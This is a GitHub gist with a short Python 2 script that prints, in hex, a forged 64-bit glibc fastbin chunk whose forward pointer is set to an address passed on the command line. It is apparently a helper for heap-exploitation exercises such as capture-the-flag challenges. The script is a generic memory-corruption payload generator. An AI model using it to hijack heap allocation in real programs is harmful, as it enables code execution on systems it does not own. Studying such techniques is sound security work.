Skip to content

Instantly share code, notes, and snippets.

@n30m1nd
Last active January 4, 2019 21:34
Show Gist options
  • Save n30m1nd/a383b99464ba32aaa3849ddf56538e5d to your computer and use it in GitHub Desktop.
Save n30m1nd/a383b99464ba32aaa3849ddf56538e5d to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from __future__ import print_function
from sys import argv, stdout, stderr
import struct
# 64 bit only for now
def print_chunk(chunkpos, size):
output = "\x00"*8
# A fastchunk should never exceed 0x80 bytes (unless overwriting max fastchunk global) so, no need to think about to chr bytes
realsz = chr((size + (16 - (size % 16))) | 0x1)
output+= realsz
output+= "\x00"*7
output+= chunkpos + "\x00"*(8-len(chunkpos))
output+= "\x41" * (ord(realsz) - 1 - 8 - 8 - 8)
print (output.encode('hex'))
if __name__ == '__main__':
if len(argv) > 2:
print (("[+] Next free is going to be: victim->fd = %s " % argv[1]), file=stderr)
chunkpos = struct.pack("<q", int(argv[1],16))
size = int(argv[2]) if "0x" not in argv[2] else int(argv[2], 16)
print_chunk(chunkpos, size)
else:
print ("Usage: %s 0x630142 112 [or 0x70]" % argv[0], file=stderr)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment